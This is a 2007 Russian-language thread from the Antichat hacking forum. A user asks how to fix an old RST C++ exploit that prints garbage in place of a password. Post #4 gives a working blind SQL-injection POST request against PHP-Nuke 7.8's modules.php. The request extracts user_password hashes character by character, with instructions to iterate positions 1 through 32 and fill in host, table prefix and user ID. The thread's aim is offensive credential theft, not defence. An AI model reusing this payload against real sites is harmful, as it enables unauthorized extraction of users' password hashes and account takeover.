ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Старый сплойт от RST c++
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Старый сплойт от RST c++
  #1  
Старый 28.03.2007, 13:59
Аватар для gcc
gcc
Участник форума
Регистрация: 27.01.2007
Сообщений: 118
Провел на форуме:
333575

Репутация: 44
По умолчанию Старый сплойт от RST c++
вообщем, это уже дело принципа, а с++ я только учу.

Есть давнишний сплойт от rst http://www.e-hack.org/exploit/archive/014.txt
если сорцы не править, выдаёт
[!] Please wait...
[+] Password: cccccccccccccccccccccccccccccccc

Заккоментировал
/*sprintf(result+pos-1,"%c",res);*/

и
/*result[33] = '\0';*/

выдает пароль вида
[!] Please wait...
[+] Password: x�dM$dSMHc


Намекните хотя бы, куда копать?!
 
Ответить с цитированием

  #2  
Старый 28.03.2007, 14:19
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
http://someshit.net/showthread.php?t=20
тут правленое)
__________________
 
Ответить с цитированием

  #3  
Старый 28.03.2007, 14:26
Аватар для gcc
gcc
Участник форума
Регистрация: 27.01.2007
Сообщений: 118
Провел на форуме:
333575

Репутация: 44
По умолчанию
Если ты про первый, то он под Vc++ , а винды сейчас нет.
Следующий - не собирается, да и не тот он =)
 
Ответить с цитированием

  #4  
Старый 28.03.2007, 22:20
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию
А что мешает вручную отправлять пакеты серверу?
например так:
Цитата:
POST http://HOST/modules.php HTTP/1.0\n
Host: HOST
Content-Type: application/x-www-form-urlencoded\n
Content-Length: длина post запроса\n\n

name=PHP-Nuke+7.8+Exploit'UNION+SELECT+1,1+FROM+PREFIX_users+WHERE+user_id=USER_ID+AND+ascii(substring(user_password,1,1))/*
и просто напросто менять 1 на 2,3,4,5...32. ну соответственно PREFIX, USER_ID, HOST и длина post запроса
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IPB 2.1.5 RST (DimaHbl4 edition) DimaHbl4 Форумы 39 25.08.2006 09:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ